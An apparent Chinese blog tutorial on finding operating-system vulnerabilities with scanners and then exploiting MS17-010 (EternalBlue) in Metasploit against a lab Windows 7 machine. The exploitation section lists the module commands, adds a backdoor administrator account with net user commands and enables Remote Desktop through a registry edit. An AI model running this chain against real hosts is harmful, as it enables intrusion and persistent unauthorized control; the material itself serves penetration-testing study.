操作系统漏洞发现
操作系统漏洞发现
- 前言
- 一、操作系统漏洞发现
- 1.1 namp
- 2. Goby
- 3. Nessus
- 二,进行渗透测试
- 2.1 使用工具进行渗透
- 1. metasploit
- 2.2 EXP
- 2.3 复现文章
- 三,操作系统漏洞修复
前言
不管是对于App来说,还是web站点来说,操作系统是必须的,对于任何一个站点,进行渗透,无非就是渗透如下几个方面:
- 操作系统,进行信息收集后,查看站点操作系统是否为最新版本,如果不是,在网上搜索,看当前操作系统是否有漏洞出现
- 系统软件,进行信息收集后,通过看站点所开放的端口,可以大致确定对方站点系统所使用的软件,入80端口,就是http服务端口,对方站点应该有web站点,开发8080对方站点可能有apache等软件,在网上查找,看当前apache版本是否有漏洞
- 第三方软件,如phpmyadmin,ssh工具等,看这个版本的软件是否有漏洞
- 最后一步才是对站点网站进行渗透,看网站是否有sql注入,逻辑漏洞等
如下是针对操作系统漏洞发现的类容:
一、操作系统漏洞发现
想要发现操作系统漏洞,不用想,肯定是工具扫描啊,推荐如下三款工具,namp,Goby,nessus。
1.1 namp
namp扫描教程
如上教程中的脚本利用就是操作系统漏洞扫描,如下是我扫描windows7靶机的结果,由于安装的是没有进行更新的windows,所以存在该漏洞,图如下所示:
2. Goby
Goby使用的是忍者操作系统上面的,忍者操作系统下载:忍者操作系统安装教程,进行漏洞扫描,就如下两步,把英文设置为中文之后,一切操作都非常简单,具体操作如下所示:
如上所示,点击开始就可以进行漏洞扫描了,全部扫描结果以可视化的方式进行展现,非常的人性化。
3. Nessus
Nessus是三款工具中最优秀的,Nessus的安装教程:Nessus安装教程,安装好之后就可以进行漏洞扫描了,其中的操作在安装教程中有说,我这里就不进行重新说明了:
二,进行渗透测试
2.1 使用工具进行渗透
1. metasploit
-
开启metasploit,及打开metasploit的控制台,使用如下两条命令:
service postgresql start # 开启数据库postgresq msfconsole # 打开控制台 -
搜索ms17-010可以利用的漏洞模块,再次确定是否存在漏洞,如下所示:
search ms17-010 # 搜索模块 use 3 # 使用第三个模块,看目标主机是否存在这个漏洞(进一步的确定) show options # 查看需要设置的参数 set rhost 192.168.93.134 # 设置参数,目标机器的IP地址为 192.168.93.134 run # 进行攻击,exploit命令也可以
-
搜索ms17-010可以利用的漏洞模块,对漏洞进行攻击,控制目标机器,如下所示:依次使用如下几条命令
search ms17-010
use 0 # 使用攻击模块攻击主机
show options
set rhost 192.168.93.134 设置攻击的目标地址
exploit
4. 进行提权等一系列操作
shell # 控制目标机器
net user root 123456 /add # 创建普通用户
net localgroup administrators root /add # 对普通用户进行提权
进行如下操作后,你打开windows目标机器,你会发现多了一个超级管理员用户如下所示:
5. 远程访问控制
首先输入
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f,打开目标机器的3389端口,该端口开放后就可以进行远程连接了:
开放端口之后,在新的终端进行远程桌面的连接,如下所示:
rdesktop 192.168.93.134:3389 # 进行远程连接目标机器,192.168.93.134是我目标机器的IP地址
如上再输入yes就是远程桌面的连接了,连接后的结果如下所示:
2.2 EXP
EXP是漏洞攻击的代码,可以进入如下两个网站进行查找,如下所示:
seebug漏洞平台
国家漏洞安全平台
漏洞利用数据库
2.3 复现文章
复现文章网上都有,直接寻找,如永恒之蓝:
搜索技巧:
信息搜集
三,操作系统漏洞修复
-
针对设计错误,微软公司会及时推出补丁程序,用户只需及时下载并安装即可,因此建议用户经常浏览微软的安全公告,并及时下载补丁。
-
对于设置错误,则应及时修改配置,使系统更加安全可靠。
相关文章:
操作系统漏洞发现
操作系统漏洞发现前言一、操作系统漏洞发现1.1 namp2. Goby3. Nessus二,进行渗透测试2.1 使用工具进行渗透1. metasploit2.2 EXP2.3 复现文章三,操作系统漏洞修复前言 不管是对于App来说,还是web站点来说,操作系统是必须的&#x…...
Linux gdb调试底层原理
TOC 前言 linux下gdb调试程序操作过程参考本人文章:gdb调试操作; 这里不再叙述; 本文主要内容是介绍GDB本地调试的底层调试原理,我们来看一下GDB是通过什么机制来控制被调试程序的执行顺序; 总结部分是断点调试的底层原理,可以直接跳转过去先看看大概…...
)
LC-1647. 字符频次唯一的最小删除次数(哈希+计数)
1647. 字符频次唯一的最小删除次数 难度中等56 如果字符串 s 中 不存在 两个不同字符 频次 相同的情况,就称 s 是 优质字符串 。 给你一个字符串 s,返回使 s 成为 优质字符串 需要删除的 最小 字符数。 字符串中字符的 频次 是该字符在字符串中的出现…...
HTTP状态码
100: 接受,正在继续处理 200: 请求成功,并返回数据 201: 请求已创建 202: 请求已接受 203: 请求成为,但未授权 204: 请求成功,没有内容 205: 请求成功,重置内容 206: 请求成功,返回部分内容 301: 永久性重定…...
【Linux】初见“which命令”,“find命令”以及linux执行命令优先级
文章目录1.which命令1.1 whereis命令1.2 locate命令1.3 搜索文件命令总结2.find命令2.1 find之exec用法2.2 管道符之xargs用法3 Linux常用命令4.命令执行优先级1.which命令 查找命令文件存放目录 搜索范围由环境变量PATH决定(echo $PATH) which命令格式࿱…...
update case when 多字段,多条件, mysql中case when用法
文章目录 前言 sql示例 普通写法: update case when写法 update case when 多字段写法 case when语法 case when 的坑 1、不符合case when条件但是字段被更新为null了 解决方法一:添加where条件 解决方法二:添加else 原样输出 2、同一条数据符…...
mysql隐式转换 “undefined“字符串匹配到mysql int类型0值字段
描述:mysql 用字符串搜索 能搜到int类型查询结果 mysql int类型条件用字符串查询 table: CREATE TABLE all_participate_records (id bigint unsigned NOT NULL AUTO_INCREMENT,created_at datetime(3) DEFAULT NULL,updated_at datetime(3) DEFAULT NULL,deleted…...
Redis八股文
1.Redis是什么? Redis 是一个基于 C 语言开发的开源数据库(BSD 许可),与传统数据库不同的是 Redis 的数据是存在内存中的(内存数据库),读写速度非常快,被广泛应用于缓存方向。并且,…...
InnoDB——详细解释锁的应用,一致性读,自增长与外键
一致性非锁定读 一致性的非锁定读(consistent nonlocking read)是指InnoDB存储引擎通过行多版本控制的方式读取当前执行时数据库中行的数据。 如果读取的行正在执行 行Delete或Update操作,这时读取操作不会因此去等待行上锁的释放。相反&…...
C++模板基础(四)
函数模板(四) ● 函数模板的实例化控制 – 显式实例化定义: template void fun(int) / template void fun(int) //header.h template<typename T> void fun(T x) {std::cout << x << std::endl; }//main.cpp #include&quo…...
pycharm使用记录
文章目录下载安装后续其他设置编辑器设置关于debug下载安装 直接去pycharm官网下载社区版,这个版本本来就是免费的,而且功能其实已经够了 后续其他设置 首先,第一次启动时,记得在preference->interpreter中设置python环境&a…...
Linux命令·kill·killall
Linux中的kill命令用来终止指定的进程(terminate a process)的运行,是Linux下进程管理的常用命令。通常,终止一个前台进程可以使用CtrlC键,但是,对于一个后台进程就须用kill命令来终止,我们就需…...
Linux /proc/version 文件解析
/proc/version文件里面的内容: Linux version 4.14.180-perf (oe-user@oe-host) (clang version 10.0.5 for Android NDK, GNU ld (GNU Binutils) 2.29.1.20180115) #1 SMP PREEMPT Wed Mar 29 18:55:02 CST 2023 /proc/version文件里面记录了如下内容: 1、Linux kernel的…...
【Django 网页Web开发】15. 实战项目:管理员增删改查,md5密码和密码重置(08)(保姆级图文)
目录1. model编写数据表2. 管理员列表2.1 admin.py视图文件2.2 admin_list.html2.3 url.py2.4 最终效果3. 管理员添加3.0 md5包的书写3.1 form.py表单组件3.2 admin.py视图文件3.3 引入公共的添加数据html3.4 url.py3.5 最终效果4. 管理员编辑4.0 form表单组件4.1 admin.py视图…...
STL容器之<array>
文章目录测试环境array介绍头文件模块类定义对象构造初始化元素访问容器大小迭代器其他函数测试环境 系统:ubuntu 22.04.2 LTS 64位 gcc版本:11.3.0 编辑器:vsCode 1.76.2 array介绍 array是固定大小的序列式容器,它包含按严格…...
flask教程6:cookie和session
文章目录一、cookie1.1 什么是cookie?1.2 使用cookie1.2.1 设置cookie1.2.2设置cookie的有效期1.2.3在Flask中查询cookie1.2.4删除cookie二、session2.1实现session的两种思路2.1.1 第一种2.1.2 第二种2.2使用session2.2 .1设置session2.2.2 设置有效期2.2.3 获取se…...
【JavaEE初阶】第六节.网络原理TCP/IP协议
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、TCP/IP协议五层协议栈; 1.1 应用层协议; 二、传输层协议; 2.1 UDP协议; 2.2 TCP协议; 2.…...
模式识别 —— 第六章 支持向量机(SVM)与核(Kernel)
模式识别 —— 第六章 支持向量机(SVM)与核(Kernel) 文章目录模式识别 —— 第六章 支持向量机(SVM)与核(Kernel)硬间隔(Hard-Margin)软间隔(Soft…...
总结 synchronized
目录synchronized的特性1. 互斥2. 刷新内存3. 可重入synchronized的使用1. 直接修饰普通方法2. 修饰静态方法3. 修饰代码块synchronized的锁机制基本特点关键锁策略 : 锁升级synchronized的特性 1. 互斥 synchronized 会起到互斥效果, 某个线程执行到某个对象的 synchronized…...
360周鸿祎又“开炮”:GPT 6-8就将产生自主意识!我们来测算一下对错
数据智能产业创新服务媒体——聚焦数智 改变商业近日,360的周鸿祎放言“GPT6到GPT8人工智能将会产生意识,变成新的物种。未来,人工智能大语言模型有可能实现自我进化,自动更新系统和自我升级,或者指数级进化能力&am…...
如何快速将Figma设计文件转换为结构化JSON数据:完整指南
如何快速将Figma设计文件转换为结构化JSON数据:完整指南 【免费下载链接】figma-to-json 💾 Read/Write Figma Files as JSON 项目地址: https://gitcode.com/gh_mirrors/fi/figma-to-json 在当今的设计开发工作流中,Figma已成为UI/UX…...
)
保姆级教程:用Sigrity PowerSI提取5GHz内单端S参数(附DDR4仿真实例)
从零掌握Sigrity PowerSI:5GHz单端S参数提取与DDR4实战解析 在高速PCB设计中,信号完整性问题往往成为工程师的"隐形杀手"。当DDR4内存接口速率突破2400MHz时,传统时域分析方法已难以捕捉信号在传输过程中的微妙变化。散射参数&…...
STM32F103C6/RC + HC-SR04超声波测距:Proteus 8.9仿真避坑与LCD1602显示实战
STM32F103C6/RC HC-SR04超声波测距:Proteus 8.9仿真避坑与LCD1602显示实战 在嵌入式开发的学习过程中,仿真工具为我们提供了极大的便利,尤其是对于资源有限或硬件条件不足的开发者来说,Proteus仿真软件无疑是一把利器。然而&…...
FigmaCN中文界面实战指南:深度解析浏览器插件本地化技术实现
FigmaCN中文界面实战指南:深度解析浏览器插件本地化技术实现 【免费下载链接】figmaCN 中文 Figma 插件,设计师人工翻译校验 项目地址: https://gitcode.com/gh_mirrors/fi/figmaCN Figma作为全球领先的云端设计协作平台,其英文界面一…...
保姆级避坑指南:在Ubuntu 18.04上用ROS Melodic和easy_handeye搞定UR5+Realsense D435i手眼标定
保姆级避坑指南:Ubuntu 18.04下ROS Melodic与UR5机械臂手眼标定实战 在工业机器人应用开发中,手眼标定是连接视觉系统与机械臂的关键环节。本文将针对UR5机械臂与Realsense D435i相机的组合,深入剖析ROS Melodic环境下使用easy_handeye进行标…...
LangChain RAG开发套件:模块化架构与生产级实践指南
1. 项目概述:一个面向RAG应用开发的“瑞士军刀”如果你正在或打算基于LangChain构建检索增强生成(RAG)应用,那么“Vargha-Kh/Langchain-RAG-DevelopmentKit”这个项目,很可能就是你一直在寻找的那个“工具箱”。它不是…...
从零部署Discord AI聊天机器人:基于ChatGPT API与Firestore的实践指南
1. 项目概述:打造一个属于你自己的Discord AI聊天机器人 如果你在运营一个Discord社区,无论是游戏公会、技术讨论组还是兴趣社团,肯定遇到过这样的场景:成员们总有一些稀奇古怪的问题,或者需要一个随时在线的“智能助…...
为什么2025年是AI Agent的爆发元年?
目录为什么2025年是AI Agent的爆发元年?引言:一个被产业界共同认定的“元年”一、产业共识:为什么“元年”不是一个空洞的口号?1.1 从“千模大战”到“智能体竞速”1.2 权威机构的一致判断1.3 市场规模的数据佐证二、技术底座&…...
SolidWorks 2021建模技巧:用‘拉伸切除’和‘多轮廓草图’高效搞定PCB屏蔽腔设计
SolidWorks 2021建模效率革命:多轮廓草图与拉伸切除在PCB屏蔽设计中的高阶应用 当你在设计一块需要严格电磁屏蔽的PCB时,那些看似简单的腔体结构往往会成为消耗你大量时间的"黑洞"。传统的单轮廓草图拉伸方式不仅操作繁琐,更会在后…...
稳压二极管数据手册参数深度解析:从符号到实战选型
1. 稳压二极管核心参数全解析 第一次拿到稳压二极管的数据手册时,我完全被那些密密麻麻的符号搞懵了。VZ、IZK、ZZT这些字母组合到底代表什么?后来在项目中踩过几次坑才明白,这些参数直接关系到电路的稳定性。就拿去年做的一个电源模块来说&a…...